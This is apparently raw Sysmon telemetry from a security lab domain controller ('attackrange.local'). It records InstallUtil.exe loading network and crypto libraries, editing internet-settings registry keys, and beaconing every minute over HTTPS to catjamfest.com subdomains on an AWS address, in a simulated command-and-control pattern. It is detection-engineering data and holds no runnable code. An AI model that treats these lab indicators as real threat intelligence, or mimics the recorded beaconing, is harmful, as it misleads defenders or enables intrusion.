12241200x800000000000000057557634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057557633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057557632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057557631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057557630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057557629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.275{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057557626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.259{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 12241200x800000000000000057557623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.244{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache 13241300x800000000000000057557621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettingsBinary Data 12241200x800000000000000057557620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057557619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 13241300x800000000000000057557618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000) 12241200x800000000000000057557617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings 12241200x800000000000000057557616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057557615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057557614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:44:57.228{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057557610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.963{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\d7dcf93739e68a3657fd4721d04b5128\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=812235F8AF7F9B9495E7D163A2DB8063,SHA256=AD041BC02D6734E91C11C784E865D883262E1A2BCBFAE514481A12A660926234false-Unavailable 734700x800000000000000057557609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.134{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=857A10F193FD44C58B11C90F04C4E62D,SHA256=33AB6056C7DED486E75E1D410233354A8BC326E4ABE95DF5566F68283014587BtrueMicrosoft WindowsValid 734700x800000000000000057557604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.861{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\caff85b7b9f3e4e5d064c8b38b4810fb\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=A3B9CCA07ABA1E54B449101B4E4C1AC2,SHA256=377CFCA37B00153D96F4AF6804FAA8CD4BA76C8FAEEE4A11D23D21E9560C14C7false-Unavailable 734700x800000000000000057557601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.845{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\7a31f084b842deabeeea41728f172462\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=3A31931D0C2ED79A7D5DAA5EFFF0F6E7,SHA256=5941CBC9C68A2416AB0513002DC388760D7956E487C50BFC5CE2103FB9B89939false-Unavailable 354300x800000000000000057558505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:45:29.794{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59121-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 22542200x800000000000000057558503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:45:29.913{8B6011A9-9A08-618E-3FFB-04000000F101}5540festival.catjamfest.com0::ffff:34.218.235.219;C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 22542200x800000000000000057558502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:45:29.898{8B6011A9-9A08-618E-3FFB-04000000F101}5540win-dc-469010.0.1.14;C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 354300x800000000000000057558508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:45:29.910{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59122-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 12241200x800000000000000057559148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:45:57.388{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057559147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:45:57.388{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 354300x800000000000000057559154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:46:29.935{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59144-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 12241200x800000000000000057559767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:46:57.440{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057559766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:46:57.409{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 22542200x800000000000000057559783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:47:29.994{8B6011A9-9A08-618E-3FFB-04000000F101}5540vibing.catjamfest.com0::ffff:34.218.235.219;C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 354300x800000000000000057559780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:47:29.991{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59161-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 12241200x800000000000000057560381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:47:57.471{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057560380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:47:57.455{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 22542200x800000000000000057560393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:30.017{8B6011A9-9A08-618E-3FFB-04000000F101}5540schedule.catjamfest.com0::ffff:34.218.235.219;C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 354300x800000000000000057560392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:30.014{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-469.attackrange.local59178-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 534500x800000000000000057560909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:13.502{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe 824800x800000000000000057560907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:13.502{8B6011A9-888A-6164-7000-00000000F101}3448C:\Windows\System32\csrss.exe{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe81360x00000000774038A0C:\Windows\System32\KERNELBASE.dll- 12241200x800000000000000057561291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache 734700x800000000000000057561290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=FEC73B133C8A34087EF9E872CD1CD45E,SHA256=4BF805F38A47FAFE9E039DE56DD1B9E36B40561C6D3FD3C75907F35CAA91D9A6trueMicrosoft WindowsValid 13241300x800000000000000057561288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettingsBinary Data 12241200x800000000000000057561287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 13241300x800000000000000057561285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000) 12241200x800000000000000057561284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings 12241200x800000000000000057561283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057561282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057561281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=CDDE3316B3736A9613F31610AC137C9E,SHA256=545CD6206CC1CD22A7CE8B4845CFCE3E06AAD97D4334588A52F0F143CC8AD171trueMicrosoft WindowsValid 734700x800000000000000057561280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=5777A6C6196919EBE8B73B273DF5FAF6,SHA256=062F973C688650068FD4B3E2EB0E474CE204120ED3E18CDC341C0A3E528C7839trueMicrosoft WindowsValid 12241200x800000000000000057561279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057561278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.100{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=F18662FD1BCB04019CA35313C7BD1AB0,SHA256=44968455D3EEA914958BF90A83BA9311E9311676C32D8D46BB6109DF655738A4trueMicrosoft WindowsValid 734700x800000000000000057561277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.085{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValid 734700x800000000000000057561276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.085{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=380F0481E3BA9EA699BB6F674A500745,SHA256=ED5F6D3E1F27292480800E540E5F60CF8E8A157B52AC47ACA8B81F57F63F30F0trueMicrosoft WindowsValid 734700x800000000000000057561275Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.085{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\OnDemandConnRouteHelper.dll10.0.14393.0 (rs1_release.160715-1616)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=DF275C9659ED8215695B572A8CE17FBC,SHA256=D8F3C962E828201B361A6F634412B7BE25EC1BD3F848F259E3C996BB9572B0FBtrueMicrosoft WindowsValid 734700x800000000000000057561274Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.085{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=89AC96525FB527CDF4FFDCDF657A3923,SHA256=737BC5E7586D9AB6306949B1470DB3DBE576638A010EEF7A297126BE30841C2FtrueMicrosoft WindowsValid 734700x800000000000000057561273Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.085{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=784B673E2ECF5794AA77952B0CD9EDA3,SHA256=5C4032070D904CED9173CE28B36F48FD28F8FEECB3CA34A89020EA707A008357trueMicrosoft WindowsValid 734700x800000000000000057561272Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\ca3f8925ea2e2c087b39a31868d01790\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D852391DF1D1D0ABD8DC0B947CDED66C,SHA256=B7B29E7192EE074DDF8F08F53E074813B0F2578F1464559E7359F1855ECEA751false-Unavailable 734700x800000000000000057561271Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=857A10F193FD44C58B11C90F04C4E62D,SHA256=33AB6056C7DED486E75E1D410233354A8BC326E4ABE95DF5566F68283014587BtrueMicrosoft WindowsValid 734700x800000000000000057561270Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptsp.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=940907E5BEF86AF8B1D4C6FF2A98061E,SHA256=6F87C4B18D0A22A7A01C3F2176A18229B78106C9A7FC3F878892F0FD9706040CtrueMicrosoft WindowsValid 734700x800000000000000057561269Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValid 734700x800000000000000057561268Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValid 734700x800000000000000057561267Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B745CDE6791890C571B08D4E29D9174E,SHA256=08B93AC421A1DA6CC4F0FE683F10C3B7679A42395854BB54CB63B5DFD5BF58BEtrueMicrosoft WindowsValid 734700x800000000000000057561266Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.069{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\d7dcf93739e68a3657fd4721d04b5128\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=812235F8AF7F9B9495E7D163A2DB8063,SHA256=AD041BC02D6734E91C11C784E865D883262E1A2BCBFAE514481A12A660926234false-Unavailable 734700x800000000000000057561265Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:48:34.053{8B6011A9-9AE1-618E-60FB-04000000F101}9832C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\caff85b7b9f3e4e5d064c8b38b4810fb\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=A3B9CCA07ABA1E54B449101B4E4C1AC2,SHA256=377CFCA37B00153D96F4AF6804FAA8CD4BA76C8FAEEE4A11D23D21E9560C14C7false-Unavailable 734700x800000000000000057561264Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 